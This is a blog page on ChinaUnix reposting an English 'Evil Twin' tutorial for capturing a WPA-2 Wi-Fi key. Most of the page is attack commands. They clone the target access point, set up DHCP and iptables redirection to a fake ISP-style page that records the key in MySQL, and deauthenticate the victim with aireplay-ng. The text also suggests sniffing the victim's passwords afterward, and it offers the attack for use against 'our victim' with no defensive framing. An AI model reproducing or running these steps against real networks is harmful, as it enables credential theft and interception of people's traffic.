Chinaunix首页 | 论坛 | 博客

张同光:Hello_everyone!ztguang.blog.chinaunix.net

首页 |  博文目录 |  关于我

ztguang

  • 博客访问: 6660049
  • 博文数量: 1159
  • 博客积分: 12444
  • 博客等级: 上将
  • 技术积分: 12570
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-13 21:34
文章分类

全部博文(1159)

文章存档

2016年(126)

2015年(350)

2014年(56)

2013年(91)

2012年(182)

2011年(193)

2010年(138)

2009年(23)

我的朋友
最近访客
推荐博文
相关博文
Hacking WPA 2 Key - Evil Twin (No Bruteforce)

分类: 网络与安全

2015-09-08 21:27:11

ealier post, we've seen how to crack WPA-2 network keys using a dictionary.

While that technique works, it could take an awful long time, especially when brute forcing.

On this technique, named 'Evil Twin', we take a different perspective to the attack. Using a powerful long range wireless card (Alfa AWUS036NH), we clone the target network to confuse our victim. Then, we deauthenticate the victim from his own wireless network and wait until he connects to our access point - which looks exactly like his. :)

When the victim connects, he is redirected to a service page asking for the WPA-2 key in order to access the internet. As soon as we get the key, you can either allow the victim to use the network (maybe improvise some password sniffing?) or just bring it down manually.

For this example I created a service page based on Verizon ISP. The files are placed at the default location (/var/www/). I created a database called 'wpa2', which can be done with the following commands:

Login to MySQL:

mysql -u root -p

Note: Default backtrack user/pass are root/toor

Create the database:

create database wpa2;

use wpa2;

create table content(key1 VARCHAR(64), key2 VARCHAR(64));

Finally, start apache and mysql services and check everything works, by going typing localhost on a web-browser.

Click here to download the files: [ BGNS - sasas

Commands:

Install dhcp3 and create config file:

apt-get install dhcp3-server -y

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

gedit /etc/dhcp3/dhcpd.conf

/etc/dhcp3/dhcpd.conf:

ddns-update-style ad-hoc;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.2.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.2.255;

option routers 192.168.2.129;

option domain-name-servers 8.8.8.8;

range 192.168.2.130 192.168.2.140;

}

Start clone access point:

airmon-ng start wlan0 [channel]

airbase-ng -e "AP name" -c [channel] mon0

ifconfig at0 up

ifconfig at0 192.168.2.129 netmask 255.255.255.128

route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

/etc/init.d/dhc1p3-server start

Flush iptables:

iptables --flush

iptables --table nat --flush

iptables --delete-chain

iptables --table nat --delete-chain

iptables --table nat --append POSTROUTING --out-interface [internet connection] -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

echo 1 > /proc/sys/net/ipv4/ip_forward

Redirect traffic:

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [IP address:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

DeAuthenticate Access Point (poor):

aireplay-ng -0 0 -a [target bssid] [monitor interface]

DeAuthenticate Client (recommended):

aireplay-ng -0 0 -a [target bssid] -c [client mac] [monitor interface]
阅读(814) | 评论(0) | 转发(0) |
0

上一篇:airbase-ng stops working after a while--wifi热点只能连接20秒左右

下一篇:kali linux——aircrack-ng

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6